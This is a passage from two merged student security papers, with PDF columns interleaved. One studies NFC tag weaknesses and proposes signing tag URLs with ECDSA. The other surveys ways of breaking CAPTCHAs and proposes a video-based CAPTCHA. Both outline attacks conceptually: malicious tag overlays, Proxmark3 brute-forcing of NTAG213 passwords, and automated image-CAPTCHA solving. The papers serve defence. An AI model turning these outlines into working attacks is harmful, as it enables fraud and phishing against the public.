they are secure. Thus, the authors have taken it upon themselves NFC, before heading into some existing vulnerabilities of NFC
to investigate on this issue, and this paper documents the efforts tags and potential exploits that can be carried out on the tags. It
put into a study of the vulnerabilities of NFC tags, in particular then segues into our proposed implementation, by means of a
NTAG203 and NTAG213. The paper also lists out measures the smartphone application, that can allow the addition of digital
authors have implemented to allow for authentication to take signatures into NFC tags and for users to authenticate such NFC
place for these tags, with backwards compatibility allowed. tags, before ending with an overarching conclusion on the project.

General Terms
Experimentation, Security, Theory.
2. OVERVIEW OF NFC
Keywords 2.1 History
Near Field Communication (NFC), Android, Public Key NFC has been around for decades, ever since it was approved in
Infrastructure (PKI), Digital Signature. 2003 as an ISO/IEC standard, and later as an ECMA standard. It
is rooted in the radio frequency identification technology, or
better known as RFID, which uses electromagnetic induction in
1. INTRODUCTION order to transmit information. Since the approval, it has been
1.1 Near field communication (NFC) gaining traction steadily, first picked up by Nokia, Philips and
The adoption of Near-Field Communication (NFC) has grown Sony when they established the NFC Forum in 2004 [2], to
drastically over the years. As shown in a survey conducted by coming out with NFC tags in 2006, to NFC enabled phones
Juniper Research, it is projected to have a take-up rate of more appearing in 2010, and even specialised NFC advertising
than five times its past user base of 101 million NFC-based companies being established such as Tapit Media in 2011. Today,
transactions in 2014, to more than 500 million users by the end of various online wallets are implemented with NFC, most notably
2019[1]. This prevalence can be attributed to the success of Apple Pay and Android Pay [3], and many credit cards also come
smartphones. Due to NFC’s widespread presence, more and more equipped with NFC capabilities to allow ease of payment for their
devices, such as credit cards, door keys and advertisement customers.
materials are turning to this contactless technology to enhance the
user experience. 2.2 What It Is
To understand NFC, it may be wise to first take a brief glance at
1.2 Motivations RFID. Essentially, RFID is the usage of radio waves for the
Despite its obvious benefits in convenience and ease of use, there unique identification of a variety of objects. The implementation
has been no clear way to verify the authenticity of an NFC tag in of such a system constitutes 2 parts: a tag, as well as a reader.
an event where an adversary introduces a malicious NFC tag There are currently 3 different frequencies at which passive RFID
which compromises a user’s NFC enabled device. For example, tags operate at:
the adversary could insert a malicious web address and the user’s
• Low Frequency (LF) 125 -134 kHz
NFC enabled smartphone could read the tag and access the link
• High Frequency (HF) 13.56 MHz
immediately as long as NFC was enabled and the phone was not
locked. • Ultra High Frequency (UHF) 856 MHz to 960 MHz

All 3 frequency bands have different applications across the


industry. NFC, which is the focus of this document, operates at
the 13.56 MHz [4] frequency band, as a branch of the HF RFID
communication protocols. NFC allows two electronic devices to
establish a connection with each other as long as they are within a
close proximity of 4 centimeters to each other. Similar to

gp04
PDFsam_merge 25
29
Bluetooth, WiFi, and other wireless communication technology an effective means to mass deploy malicious payload. Public
standards, NFC sends information over radio waves, with data spaces where the tags can be found are often accessible to anyone
transmission rates at either 106, 212 or 424 kilobits per second. at any time, and one can easily gain physical access to the tags. It
After the connection is successfully established, it can then is also not difficult to perform malicious actions to those tags, as
activate a set of functionalities of the NFC enabled device. they have no mechanism to ensure its security.
If an NFC tag containing a link is scanned, the smartphone
2.3 Current Uses (Android-based) will not ask the user for a confirmation before
From contactless payment systems to acting as identity and access launching the browser and accessing the URL obtained. By
tokens and even gaming, NFC enjoys a wide range of applications directing the unsuspecting user to a spoofed website, the attacker
in the world today. Over the years, it has become more and more can proceed to conduct browser based attacks such as XSS and
prevalent to incorporate NFC into our daily lives. Some example CSRF, or phishing attacks to steal important credentials, or even
uses include both Android Pay and Apple Pay, as mentioned tricking the user into mistakenly installing malware whilst being
previously, and also in Samsung smart doors where you have the under the impression that they were downloading an advertised
option to use a card to unlock your door instead of traditional file on posters accompanying the NFC tags. In a bid for
keys. An innovative idea might be the incorporation of NFC tags efficiency, the smartphone will launch applications to serve the
into your business card for your potential customers to access say, NFC content without explicitly asking for user approval or choice
your website virtually instantly! of application [9]. This could potentially be very dangerous.
2.4 Prospect According to a survey conducted by CNBC [10], less than 14% of
The usage of NFC and NFC-based development also appears to the surveyed smartphone users do not have antiviruses installed
be on track to expand even further as Apple Inc. announced [5] on their phones. Any attack that surfaces might have an
that with the current version of its mobile operating system, iOS undesirably high chance of success. Examples of attack scenarios
11, it now allows third-party developers to be able to read from will be discussed further in the following subsection.
NFC tags. Most Android smartphones already have the capability
to read and/or write onto NFC tags with appropriate software. 3.3 Analysis on Possible Exploits
With 99.6% of new smartphones now being either the iPhone or 3.3.1 Social engineering
Android-based [6], it can be said with certainty that NFC will
In a social engineering attack, the attacker can prey on unwary
continue to see a great rise in usage over the next few years.
victims by simply pasting a malicious NFC tag over a legitimate
one and restricting interaction with the latter via the use of a
Faraday cage, as described previously. The malicious tag may
3. EXPERIMENTATION PROCESS contain a URL to a phishing website or wireless credentials to a
rogue wireless access point.
3.1 Overview of NTAG203/NTAG213
Developed by NXP Semiconductors, NTAG203 and NTAG213 To carry out the attack, the attacker must first gain physical access
have only the capacity of 144 bytes compared to their larger- to the NFC tag and be unrestricted from physically tampering with
storage counterparts. However, these are more widely available it. This is, however, likely to be the case every time as the very
due to its compatibility with a wide range of smartphones and nature of NFC’s close-proximity workings dictate that anyone will
lower cost. The difference between NTAG203 and the newer be able to go up to the tag and interact with it.
variant, NTAG213, is that the latter features a 32 bits 4 digits
password [7], enabling restriction to operations that may alter the In addition, since the NTAG203/NTAG213 tags can be purchased
memory of a NFC tag. A NFC tag is typically used to facilitate from the Internet both easily and cheaply for under a dollar,
transmission of information. It can store various MIME types coupled with the fact that most smartphones come equipped with
such as URL, Credentials to a wireless access point or text file. a NFC reader/writer, any person with such devices will be able to
Typically, smartphone operating system will open application to write their own NFC tags at a very low cost. As such, it can be
serve the content of the NFC tags to the users. assumed that this mode of attack will be relatively easy to do for
the attacker.

3.2 Vulnerabilities In fact, as seen in ATM skimming attacks, given enough time and
NTAG203/NTAG213 can be commonly found in public spaces, effort, attackers will be able to produce skimmers that are nearly
such as bus stops, where it is used as a means to disseminate indistinguishable from a legitimate card swipe mechanism on an
information. ATM. This spells trouble for malicious NFC tags, which are way
easier and faster to obtain and replicate.
For example, Clear Channel Singapore [8], an outdoor advertising
company, makes use of NFC in their various advertisement 3.3.2 Brute force attacks on NTAG213
platform offerings to encourage users to interact with the The newer variant, NTAG213, features a password system to
displayed content. According to the company, the NFC- restrict unauthorized access and also contains a safety mechanism
incorporated advertising platforms can enable the target audience to lock itself after a defined number of failed password attempts.
to interact with the advertised content in a variety of ways; such as Given this, one would expect that brute force attacks should be
by purchasing vouchers on the spot, downloading music or less effective on the NTAG213.
videos, or simply browsing the information that is being offered.
Clear Channel claims that they are operational at 8 out of every 10 It is, however, unfortunate that despite having the aforementioned
bus stops in Singapore, and that a two-week advertising campaign security mechanisms in place, it is still possible for an attacker to
can generate an outreach of 80% of the population. This presents read and emulate a NTAG213 tag that has such locks enforced,
a worrying situation as its ease of use and availability can serve as even with a very small allowed number of failed password

gp04
PDFsam_merge 26
30
attempts (e.g. 3). With the use of Proxmark3, a powerful general- digest, i.e. H(m) = H(m’). Since Signature(H(m)) =
purpose RFID tool, the attacker can emulate and launch a brute Signature(H(m’)), the adversary will able to forge a signature with
force attack even with such restrictions [11]. By emulating the tag, the hash collision. Therefore, we chose SHA384 as our choice of
the counter for number of password attempts for the original tag a cryptographically secure hash. Additionally, with the use of this
will thus be maintained at 3. This allows the attacker freedom to hash, performance can be improved in terms of easier
brute-force all possible password combinations in a relatively computation of the signature.
small amount of time, given that there are at most 10000 different
password combinations available for the 4-digit (32-bit) 4.3 Elliptic Curve Digital Signature
password. Algorithm (ECDSA)
The NTAG213 has a storage limit of 144 bytes, while the length
3.4 Remarks on Existing Exploits of a typical URL can take 40 bytes or more. This leaves us with
Even though some form of security mechanism is implemented in 144 - 40 = 104 bytes to work with for the digital signature. A
both NTAG203 and NTAG213, they prove to be ineffective when Base64-encoded 256-bits signature takes up 96 characters (bytes),
faced with modern methods of attack. If we were to incorporate making it just enough to fit into the NFC tag.
security into NFC tags properly, authenticity and integrity are key Since ECDSA uses Elliptic Curve Cryptography, it allows us to
components that cannot be overlooked. Therefore, our proposed use a relatively smaller number of bits for comparable security
implementation shall address methods where security can be levels with other Public Key Infrastructure (PKI) cryptographic
retrofitted to NTAG203 and NTAG213 to guarantee authenticity schemes such as RSA and Elgamal.
and integrity in a scalable, and also backward compatible manner.
A signer has the ability to choose any named curves to be used
according to their specific security requirements, as long as
OpenSSL supports them. This is useful for when a specific
4. DESIGN CONSIDERATIONS domain requires a smaller key length to allow more space for a
Before we move on to our solution, we will discuss the longer URL, or a larger key length can be used for domains with
considerations undertaken in the design process. As discussed in shorter URLs.
the previous section, it is crucial that we guarantee authenticity Our recommendation is the Prime256v1 curve. The security of the
and integrity in NTAG203 and NTAG213. To be able to use it 256 bits of ECC is comparable to the security of the 3072 bits of
seamlessly with both older and newer tags, our solution also has RSA and ElGamal [12]. Not only that, it should fit in the NFC tag
to be scalable and backwards compatible. together with an average URL length. According to NIST’s
recommendation [13], 256 bits of Elliptic Curve is secure beyond
4.1 Security Requirements 2030. Other curves such as prime192v3 or prime239v3 can also
be used. They are 192 bits and 239 bits respectively.
4.1.1 Fundamentals
• Authenticity: Given two NFC tags, n and n’, we must be 4.4 PKI
able to know if these tags come from trustworthy sources. PKI is used as an infrastructure to securely transfer the public
• Integrity: The data that is stored inside the NFC tags must keys as a form of certificate. It also makes our business flow
not have been tampered with. We must also be able to make highly scalable. Suppose companies express interest in using our
a judgement call on whether to load the data based on application for securing their advertisement-purposed NFC
whether it has been tampered with or not. stickers. If they already own a public certificate signed by a
trusted Certificate Authority, we will have no issues verifying
• Non-repudiation: The signer of the tag is not able to deny their identity and deeming them as trustworthy content providers.
that the tag is signed by them. The exact business flow will be discussion on later in section
5.2.1.
4.1.2 Attack models of adversary
These are the possible attack models that an adversary can 4.5 Revocation of Certificate
employ. In the event where a registered company’s private key is leaked or
compromised, their certificate has to be revoked for security
• Total break: The adversary wants to find our private key.
reasons. In our implementation, all public keys belonging to our
• Selective forgery: Given a message m, the adversary wants registered organisations are hosted on our database and will only
to forge the signature. be downloaded into our mobile application when necessary. To
achieve this revocation of certificates, our website can do a push
• Existential forgery: The adversary wants to create valid notification to our mobile application to purge the cache of a
message-signature pairs (m,s) that are valid. revoked certificate.

4.2 Hash-Then-Sign Approach 4.6 Backwards Compatibility


Using the hash-then-sign approach to signing prevents forgery We want to maximise backwards compatibility so that the rollout
attacks highlighted in the attack models above. This is because the of our proposed implementation can happen in phases, without
hash function makes the resulting digest computationally requiring abrupt changes or an entire overhaul of the old system.
infeasible for the adversary to arrive at a collision. However, in This allows for a smooth transition to the new scheme.
order to achieve this, the chosen hash function must be
cryptographically secure. If it is not second preimage resistant, the 4.7 Other Considerations
adversary will be able to find a collision where different messages This idea should not extend well to public URL shortener services
m and m’ undergo the same hash function H but result in the same like goo.gl as anyone can create an URL without verification.

gp04
PDFsam_merge 27
31
5. PROPOSED SECURITY the public certificate of the domain from the application storage,
which will be used for decryption later on.
IMPEMENTATION
Let the public certificate for the domain be as follows, in Figure 2:
5.1 RetrofitSecureNFC
RetrofitSecureNFC is an android application that is able to run
on any smartphone with a NFC scanner and with Android 5.0 or
later as its operating system. It makes use of Spongy Castle [14], a
cryptographic library for Android.
5.1.1 How it works
In Android, an application can get notified of a NFC event from
the operating system by subscribing to events such as:
• ACTION_NDEF_DISCOVERED
• ACTION_TECH_DISCOVERED
• ACTION_TAG_DISCOVERED
ACTION_NDEF_DISCOVERED event enables applications
that are not running in the foreground to handle an NFC event.
However, it requires the application to subscribe to domains that
Figure 2. Public certificate for domain
it intends to handle at compile-time. The subscribed domains must
be at least a Partially Qualified Domain Name (PQDN) with a The text representation of the certificate above can be found in
third-level-domain name i.e. *.nus.edu.sg and it cannot be a Figure 3:
wildcard i.e. *.sg or *.
For instance, if RetrofitSecureNFC subscribes to the
*.nus.edu.sg domain, then the Android OS will run
RetrofitSecureNFC to handle such links belonging to registered
domains. This subscription example can be found in the code
snippet depicted in Figure 1 below.

Figure 1. Example code snippet of URL subscription


As it is not possible to subscribe to all URL links with
ACTION_NDEF_DISCOVERED event,
ACTION_TAG_DISCOVERED event is then used to intercept
any other links that is not subscribed. However, this requires the
application to be running on the foreground.
Figure 3. Text representation of public certificate
We shall now go into an example to illustrate how the application
works. Suppose an NFC tag contains this URL as its payload: In our example URL, the sig in the GET parameter is the Base64
encoded representation of the digital signature of the entire link it
http://news.nus.edu.sg/highlights/grants-promote-cybersecurity- is appended to. We can now see that our digital signature in
research?sig=MEYCIQD1NuJzQSzPWhVQPk5WbIbP8MoYZ1jH Base64 encoding is equivalent to:
R/tBwb25/b0d5QIhANAJU0s/QJInSsRz4mXE+JT9JTPdL5IN/l5L
MEYCIQD1NuJzQSzPWhVQPk5WbIbP8MoYZ1jHR/tBwb25
20ekFjBL
/b0d5QIhANAJU0s/QJInSsRz4mXE+JT9JTPdL5IN/l5L
Since RetrofitSecureNFC explicitly subscribes to *.nus.edu.sg 20ekFjBL
domain, the application then must already know how to handle it. We now decode the signature back to its binary representation
In our case, we already have a public key for *.nus.edu.sg domain. with a simple Base64 decode function. What we get is a binary
After Android OS passes the handler to RetrofitSecureNFC, the value that looks something like this:
application will then parse the URL to obtain its domain and sig
from the GET parameters, as can be seen in the URL above. 0F!6sA,ZP>NVlgXGA! SK?@'Jse%3/
Thereafter, it uses the domain (i.e. nus.edu.sg) as a key to fetch ^KG0K

gp04
PDFsam_merge 28
32
Next, the digital signature in binary representation is decrypted Figure 5. RetrofitSecureNFC: successful authentication screen
using the public certificate we fetched earlier to obtain a SHA384 On the other hand, if our application cannot verify the authenticity
hash of the URL. The resultant hash of SHA384(URL) will thus of the NFC tag being read, the user will be prevented from
look something like this: proceeding with the data read. Figure 6 shows the screen
aa1a4c76a1ec9220f10f03baba96e7d3d0e79f8751a5 displayed when an NFC tag cannot be authenticated.
529814dba513dbaac715cee65b928231754a8b91f571
a6277de9
Following that, we get the substring of the original URL without
the sig parameter, and do a SHA384 hash on that URL. Finally,
we do a comparison between the two hashes, and if they are equal,
we are able to verify that the identity of the URL is authentic.
If the two hashes do not match, we can assume that the payload
has been tampered with, and refuse connection to the URL inside
the tag. This way, we allow for a mechanic to authenticate and
secure the NFC tags.

5.1.2 Application in action


Figure 4 below illustrates the splash screen of
RetrofitSecureNFC. It is the default screen seen when the
application is launched and there are no NFC tags nearby to be
read.

Figure 6. RetrofitSecureNFC: unsuccessful authentication


screen

5.2 Beyond RetrofitSecureNFC


5.2.1 Possible business flow
We will now postulate about possible improvements on top of our
proposed solution. Suppose Company A would like to enrol into
our programme. Given that situation, there are 3 possible cases to
consider.
Case 1: Company A has already has an ECC public certificate
signed by a well-known trusted root
1. We simply include the certificate in our application.
Case 2: Company A has a public certificate signed by a well-
Figure 4. RetrofitSecureNFC: splash screen known trusted root
When the user’s NFC-enabled android device scans an NFC tag, 1. We generate a pseudorandom sequence, say R, and we
and RetrofitSecureNFC is able to authenticate the tag, the user encrypt it using Company A’s public certificate.
will be allowed to proceed to load the content into another 2. We send it as a form of challenge to Company A.
appropriate application e.g. a browser for opening URLs. Figure 5
below shows the screen that is displayed upon successful 3. Company A should return the decrypted pseudorandom
authentication. sequence R within a small, specified window of time.
4. Since Company A has no ECC certificate, we will
request Company A to generate an ECC private key
using OpenSSL, and then generate a CSR from it. We
will only take CSR from Company A.
5. We validate the CSR, extract Company A’s public key
from the CSR and sign a public certificate.
6. We then include the certificate in our application and
send the certificate back to the company
Case 3: Company A has no public certificate signed by a well-
known trusted root
1. We contact and validate Company A’s entity, intention
and usage for joining our programme
2. Since Company A has no ECC certificate, we request
Company A to generate an ECC private key using

gp04
PDFsam_merge 29
33
OpenSSL, then generate a CSR from it. We only take 8. ACKNOWLEDGEMENTS
CSR from Company A. The authors of this paper would like to extend their gratification
3. We validate the CSR, extract Company A’s public key to A/Prof Hugh Anderson for his guidance and support
from the CSR and sign a public certificate. throughout this project, helping us to procure the NTAGs and
4. We will include the certificate in our application and card readers for our project and offering timely feedback on the
also send it back to the company. direction of the project.

5.2.2 Creating ECC keys using OpenSSL 9. REFERENCES


Referring to the previous example of the case 2, we see that [1] Smith, S. (n.d.). Apple Pay and HCE To Push NFC Payment
Company A was required to generate ECC keys using OpenSSL. Users to More Than 500 Million by 2019, Juniper Research
In this section, we briefly go through how. By using OpenSSL, a Finds. Retrieved November 10, 2017, from
well-known open source library for creating keys and certificates, https://www.juniperresearch.com/press/press-releases/apple-
one can easily generate elliptic curve keys by using the following pay-and-hce-to-push-nfc-payment-users-to-mor
commands.
[2] Vanderkay, J. (2004, March 18). Nokia, Philips And Sony
The following command will output a list of named curves Establish The Near Field Communication (NFC) Forum.
supported by OpenSSL: Retrieved November 10, 2017, from https://nfc-
openssl ecparam -list_curves forum.org/newsroom/nokia-philips-and-sony-establish-the-
near-field-communication-nfc-forum/
Suppose Company A chooses to use the prime256v1 curve. All it
[3] Google Launches Android Pay App. (2015, September 11).
has to do is enter these commands:
Retrieved November 10, 2017, from
openssl ecparam -genkey -name prime256v1 - https://blog.chinavasion.com/index.php/36924/google-
noout -out key.pem launches-android-pay-app/
[4] Triggs, R. (2017, August 15). What is NFC & how does it
openssl req -new -sha256 -key key.pem -out work? Retrieved November 10, 2017, from
csr.csr https://www.androidauthority.com/what-is-nfc-270730/
The resultant csr.csr file will be sent to us, and we will use the [5] Hern, A. (2017, June 07). The 10 biggest changes Apple
following command to sign the certificate: didn't announce on stage at WWDC. Retrieved November
10, 2017, from
openssl req -x509 -sha256 -days 365 -key https://www.theguardian.com/technology/2017/jun/07/apple-
key.pem -in csr.csr -out certificate.pem wwdc-changes-announce-on-stage-wired-keyboards-
We are then about to add the certificate into our database for facebook-twitter-ios-11-pencil
usage in future verifications of NFC tags signed by Company A. [6] Vincent, J. (2017, February 16). 99.6 percent of new
smartphones run Android or iOS. Retrieved November 10,
6. POTENTIAL SCHEME FOR OTHER 2017, from
DEVICES https://www.theverge.com/2017/2/16/14634656/android-ios-
This project highlights the possibility that a more robust market-share-blackberry-2016
authentication scheme could be extended to QR codes or even to [7] NXP Semiconductors N.V. (2015, June 02).
the NUS matriculation and/or staff cards. NFC tags (NTAG203 NTAG213/215/216 Product data sheet. Retrieved November
and NTAG213 in particular) has a very small storage size of 144 10, 2017, from https://www.nxp.com/docs/en/data-
bytes, and our scheme is able to be secure even with the space sheet/NTAG213_215_216.pdf
constraints. We will thus be able to apply this scheme to data [8] Clear Channel. (n.d.). Retrieved October 03, 2017, from
containing mediums with similar storage capacities, for example http://www.clearchannel.com.sg/impact/bits-pixel#connect
QR codes, and give authenticity to such mediums, providing
security across multiple data storage platforms. [9] Google Inc. (2017, July 24). Retrieved November 10, 2017,
from
7. CONCLUSION https://developer.android.com/guide/topics/connectivity/nfc/
In conclusion, we would like to reiterate that the current NFC tags nfc.html
are lacking in many aspects of security. Company such as [10] Weisbaum, H. (2014, April 26). Data at risk as Americans
BlackSeal by TrustPoint, together with NFC Forum, are pushing don't protect smartphones. Retrieved November 10, 2017,
for secure standards in NFC protocols such as NFC tags with from https://www.cnbc.com/2014/04/26/most-americans-
signature RTD 2.0. However, without any widespread attacks on dont-secure-their-smartphones.html
NFC, there is no motivation nor urgency for the industry to adopt
[11] Proxmark developers community. (n.d.). Retrieved
such standards. As it is predicted that NFC’s usage and
November 10, 2017, from
implementations will continue to rise, we can say with certainty
http://www.proxmark.org/forum/viewtopic.php?id=2657
that an NFC based attack in the future is inevitable. Preemptive
measures should be undertaken and we strongly recommend that [12] How do RSA and ElGamal key sizes compare? (2014,
secure standards be incorporated into NFC enabled devices as a October 10). Retrieved November 10, 2017, from
default protocol. https://crypto.stackexchange.com/questions/19583/how-do-
rsa-and-elgamal-key-sizes-compare

gp04
PDFsam_merge 30
34
[13] Giry, D. (2017, February 23). Cryptographic Key Length
Recommendation. Retrieved November 10, 2017, from
https://www.keylength.com/en/4/
[14] Spongy Castle. (n.d.). Retrieved November 10, 2017, from
https://rtyley.github.io/spongycastle/

gp04
PDFsam_merge 31
35
PDFsam_merge 36
VideoCaptcha 
Ong​ ​Liwei  Lim​ ​Wei​ ​Jie  Marcus​ ​Ng​ ​Wen​ ​Jian 
School​ ​of​ ​Computing,​ ​National  School​ ​of​ ​Computing,​ ​National  School​ ​of​ ​Computing,​ ​National 
University​ ​of​ ​Singapore  University​ ​of​ ​Singapore  University​ ​of​ ​Singapore 
21​ ​Lower​ ​Kent​ ​Ridge​ ​Rd  21​ ​Lower​ ​Kent​ ​Ridge​ ​Rd 21​ ​Lower​ ​Kent​ ​Ridge​ ​Rd
Singapore​ ​119077  Singapore​ ​119077  Singapore​ ​119077 
+65​ ​98578398  +65​ ​88766462  +65​ ​97502493 
a0124093@u.nus.edu  e0003013@u.nus.edu  e0003142@u.nus.edu 
     
Mooi​ ​Chung​ ​Yu​ ​Dexter  Low​ ​Bao​ ​Ling​ ​Vivian   
School​ ​of​ ​Computing,​ ​National  School​ ​of​ ​Computing,​ ​National 
University​ ​of​ ​Singapore  University​ ​of​ ​Singapore   
21​ ​Lower​ ​Kent​ ​Ridge​ ​Rd 21​ ​Lower​ ​Kent​ ​Ridge​ ​Rd
Singapore​ ​119077 Singapore​ ​119077
+65​ ​98317385  +65​ ​98317385 
a0124586@u.nus.edu  e0002546@u.nus.edu 
 
ABSTRACT
In this paper, we investigate the phenomenon of Completely Table 1. List of CAPTCHA solving services online
Automated Public Turing tests to tell Computers and Humans (non-exhaustive)
Apart (CAPTCHA) being broken with increasing accuracy: the
attack​ ​vectors​ ​and​ ​current​ ​mitigations.
We document our attempt to make an enhancement to this
existing captcha to make a captcha that easy to solve for humans
but​ ​harder​ ​to​ ​break​ ​for​ ​bots.

Categories​ ​and​ ​Subject​ ​Descriptors


K.6.5 [​Management of Computing and Information Systems​]:
Security​ ​and​ ​Protection.

Keywords
Video​ ​CAPTCHA,​ ​Automated​ ​Turing​ ​Test

1. INTRODUCTION
Conventional CAPTCHAs revolve around getting users to
identify distorted letters and have been the go-to method of
deterring bots for years. As mentioned in our project objective, we
noticed that such captchas are being solved with alarming ease by
machines​ ​(aka​ ​bots).
We attribute one of the main reasons to the increasing
“intelligence” of software - technological advancements in the
​​
recent years have reduced the average difficulty in automating
captcha solving. CAPTCHA-solving services can be found online 2. CONCERNS
easily; such services may achieve their objective through optical
character recognition (OCR), or data curation of as many captcha 2.1 Security
images as possible. On a lower level, open-source libraries with Security of the CAPTCHA process is definitely the main concern
trained OCR models (such as pyocr and pytesseract) are widely for software systems or web applications. If bots were able to
available to allow almost anyone to automate a CAPTCHA attack. break CAPTCHA defences with such ease, then not only would it
[1] not deter spam traffic, but damage the business. We look at some
of​ ​the​ ​methodologies​ ​(attack​ ​vectors)​ ​employed.

gp05
PDFsam_merge 33
37
2.1.1 Optical​ ​Character​ ​Recognition​ ​(OCR) Figure​ ​2:​ ​Disability​ ​statistics​ ​in​ ​North​ ​America​ ​region
This machine-learning based method has been widely used to
solve text-based visual CAPTCHAs, as mentioned in Section 1.
The fundamental concept of OCR involves feeding binary 3. RECTIFICATION
representations of distorted text images as inputs into a trained We set out to investigate and assess a few of the approaches taken
neural​ ​network. by several companies and/or websites in recent times to mitigate
the aforementioned phenomenon, and after obtaining the
2.1.2 Replay​ ​attack necessary information brainstorm on how we can re-innovate the
Several CAPTCHA implementations associate a session ID or key captcha​ ​process​ ​without​ ​losing​ ​its​ ​initial​ ​intended​ ​purpose.
with a every CAPTCHA challenge. Attackers can simply utilize
the solution to one image multiple times by reusing the key. Such 3.1 Gamified​ ​CAPTCHA
an attack can also be classified under weak implementation/design FunCAPTCHA came up with the idea of amalgamating games
flaw. Such attacks are less prevalent now as mitigation is fairly with the CAPTCHA-solving process. Users are given an image of
simple: adding expiration to every session ID, or enforcing an animal writ large, that is not upright, and are asked to rotate
one-time​ ​use. them to an upright position using the left and right buttons
2.1.3 Hash​ ​tables provided. While there is no additional level of security provided
with this variation, it does attempt to mitigate the issue of bad user
This vector of attack is specific to object-based CAPTCHA
experience​ ​generally​ ​associated​ ​with​ ​CAPTCHA​ ​solving.
(Section 4.1). By outsourcing CAPTCHA challenges to be
manually solved by humans, attackers are able to amass a large 3.2 Object-based​ ​CAPTCHA
database​ ​of​ ​CAPTCHA-answer​ ​pairs.

2.2 Accessibility
Accessibility issues has been one of the topics that has sparked
much controversy for adopting CAPTCHA systems. In North
America alone, nearly 50% of internet users suffer from some
form of disability. In particular, users with reading/seeing
difficulties and color blindness make up 32% of the population.
[2] These users are most affected by CAPTCHAs and require
alternative methods to be identified as a human. CAPTCHA
providers have to factor this into consideration when developing
alternative​ ​CAPTCHA​ ​methods.
The main alternative for visual CAPTCHAs currently are audio
CAPTCHAs, where users are supposed to input the letters which
are heard from the spoken audio clip. The audio clips are
deliberately noise enhanced to make any form of programmatic
voice recognition difficult. Even so, this CAPTCHA method is
still easier to decode compared to current CAPTCHA evolutions
as discussed in Section 3. The trade-off from employing such
implementations is that a majority of them have severe
accessibility issues. As such, CAPTCHA providers have to
include an audio-based alternative together with their visual-based Figure​ ​3.​ ​Object-based​ ​CAPTCHA
widgets. [3] This opens up an attack vector similar to a downgrade
attack, where bots are able to opt for audio-based CAPTCHA reCAPTCHA’s 2014 release features a CAPTCHA system that
verification. required users to select images out of nine that contained a
particular object. The motivation for this CAPTCHA variation is
that solving these CAPTCHAs using image recognition would be
much​ ​harder​ ​to​ ​perform​ ​than​ ​the​ ​text-based​ ​ones.
Documented attempts to break the image-based CAPTCHA has
been mildly successful; by utilizing several image annotation tools
- one of them being Google’s own Google Reverse Image Search
(GRIS) - and aggregating the classification results, a group of
university students were able to solve a stratified sample of
reCAPTCHA tests programmatically with up to 60% accuracy.
[4] The algorithm for solving a single CAPTCHA process is as
follows:
1. Identify​ ​target​ ​object​ ​name.
2. Extract the first image from the CAPTCHA and feed it
into the image annotation module to obtain the image
classifier​ ​tags.

gp05
PDFsam_merge 34
38
3. Compare the object name with the tags; if a match is 3.5 Invisible​ ​CAPTCHA
found,​ ​select​ ​the​ ​image.
4. Repeat steps 2-3 for the remaining 8 CAPTCHA reCAPTCHA’s latest release (2017) took its one-click CAPTCHA
images. a step further by removing any form of user interaction altogether.
[7] By analyzing information of the browser used to access the
By further storing and reusing the classification results from the webpage, as well as user browsing history through the use of
above algorithm, Google’s large database of object images, the cookies, reCAPTCHA is able to identify if the incoming traffic is
solving​ ​accuracy​ ​increased​ ​to​ ​70%. from​ ​a​ ​human​ ​or​ ​a​ ​bot.
Due to the performance bottleneck in the image classification 3.6 Video-based​ ​CAPTCHA
phase, each CAPTCHA process took an average of 20 seconds. We take a look at video-based CAPTCHAs offered by
The demonstration highlights the need for enhancements to this NuCaptcha. NuCaptcha displays animated distorted texts in a
type​ ​of​ ​CAPTCHA​ ​method. video which typically scrolls from one edge of the screen to
3.3 Behavior​ ​Analysis another, and users are required to enter the text that is in a
different color than the rest. Random unrelated clips will be
Shortly after their release of the object-based CAPTCHA, played in the background to increase the difficulty for machines to
reCAPTCHA introduced an enhancement to its CAPTCHA identify​ ​the​ ​moving​ ​texts.​ ​[8]
system that only requires users to check a tick box. [5] Titled
NoCAPTCHA, it uses advanced risk analysis that tracks the entire 4. VIDEOCAPTCHA
user interaction from the point the CAPTCHA widget renders on
the web page to the point which the checkbox is checked. For 4.1 Introduction
example, the entire path of the mouse pointer taken by a human VideoCaptcha uses the idea that it is harder for bots to process
and a bot differs significantly, and can be leveraged on to information through animation compared to static images and is
distinguish between authentic users and spammers (programmable computationally​ ​harder​ ​to​ ​perform​ ​analysis.
webdrivers like Selenium would trigger the checkbox
instantaneously). The video captcha will show a few images at random and display
a​ ​short​ ​clip​ ​that​ ​is​ ​related​ ​to​ ​at​ ​least​ ​one​ ​of​ ​the​ ​displayed​ ​images.
The user will then be prompted to answer a question and select the
image that best fits as the response. If the user has selected the
correct response, then they will be re-directed to the target page.
Otherwise, a new set of clip and images will be randomly chosen
and​ ​displayed.
Figure​ ​4:​ ​One-click​ ​CAPTCHA​ ​widget​ ​by​ ​Google’s
reCAPTCHA

Although the parameters collected for risk analysis are not


officially disclosed by Google due to security reasons, a reverse
engineering attempt on reCAPTCHA’s client-sided javascripts
identified that the following information were collected prior to
the​ ​actual​ ​verification​ ​[6]:
1. Plug-ins
2. User-agent
3. Screen​ ​resolution
4. Execution​ ​time,​ ​timezone
5. Number of click/keyboard/touch actions in the
<iframe>​​ ​of​ ​the​ ​captcha
6. Behavior​ ​of​ ​browser-specific​ ​functions​ ​and​ ​CSS​ ​rules
7. Render​ ​result​ ​of​ ​canvas​ ​elements
8. Cookies Figure​ ​5.​ ​VideoCaptcha​ ​example
3.4 Code​ ​Obfuscation
The reverse engineering attempt mentioned in Section 3.3 also The difference between VideoCaptcha and NuCaptcha is that
discovered that reCAPTCHA heavily obfuscated the client sided VideoCaptcha expects users to identify objects or actions in the
code that was used to load the CAPTCHA widget. [6] video.
Specifically, the script contained compiled javascript bytecode
that was executed on the client side after the resource was fetched. 4.2 Considerations
Although code obfuscation is not an entirely secure method of
protecting the CAPTCHA implementation from being exploited, it 4.2.1 Lack​ ​of​ ​answer​ ​choices
definitely makes the exploit process more tedious and deters less As seen from the initial design in Figure 5, users have to choose
technical​ ​proficient​ ​abusers​ ​from​ ​attempting​ ​such​ ​an​ ​act. exactly one correct answer from the 4 choices. This
multiple-choice constraint suggests that bots are able to constantly

gp05
PDFsam_merge 35
39
select the first option and still able to achieve a theoretical 25% user, where every user that sends a request instantaneously to our
success. server will be rejected as this ‘user’ is likely to be non-human.
Another scheme that we have thought is to create another time
4.2.2 Accessibility period scheme that is inspired by NoCAPTCHA reCAPTCHA. In
Similar to other visual-based CAPTCHAs, users with difficulty in this additional implementation, we will impose a timeout period
